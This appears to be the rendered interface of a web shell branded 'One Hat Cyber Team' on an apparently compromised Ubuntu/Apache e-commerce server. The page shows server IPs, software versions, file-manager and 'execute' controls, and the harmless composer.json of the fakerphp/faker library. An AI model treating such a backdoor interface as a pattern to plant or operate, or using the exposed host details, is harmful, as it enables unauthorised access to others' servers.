⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.226
Server IP:
13.127.59.50
Server:
Linux ip-172-31-46-210 5.15.0-1033-aws #37~20.04.1-Ubuntu SMP Fri Mar 17 11:39:30 UTC 2023 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.3-4ubuntu2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
ecommerce_pg
/
vendor
/
fakerphp
/
faker
/
View File Name :
composer.json
{ "name": "fakerphp/faker", "type": "library", "description": "Faker is a PHP library that generates fake data for you.", "keywords": [ "faker", "fixtures", "data" ], "license": "MIT", "authors": [ { "name": "François Zaninotto" } ], "require": { "php": "^7.4 || ^8.0", "psr/container": "^1.0 || ^2.0", "symfony/deprecation-contracts": "^2.2 || ^3.0" }, "require-dev": { "ext-intl": "*", "bamarni/composer-bin-plugin": "^1.4.1", "doctrine/persistence": "^1.3 || ^2.0", "phpunit/phpunit": "^9.5.26", "symfony/phpunit-bridge": "^5.4.16" }, "autoload": { "psr-4": { "Faker\\": "src/Faker/" } }, "autoload-dev": { "psr-4": { "Faker\\Test\\": "test/Faker/", "Faker\\Test\\Fixture\\": "test/Fixture/" } }, "conflict": { "fzaninotto/faker": "*" }, "suggest": { "ext-curl": "Required by Faker\\Provider\\Image to download images.", "ext-dom": "Required by Faker\\Provider\\HtmlLorem for generating random HTML.", "ext-iconv": "Required by Faker\\Provider\\ru_RU\\Text::realText() for generating real Russian text.", "ext-mbstring": "Required for multibyte Unicode string functionality.", "doctrine/orm": "Required to use Faker\\ORM\\Doctrine" }, "config": { "allow-plugins": { "bamarni/composer-bin-plugin": true, "composer/package-versions-deprecated": true }, "sort-packages": true }, "extra": { "branch-alias": { "dev-main": "v1.21-dev" } } }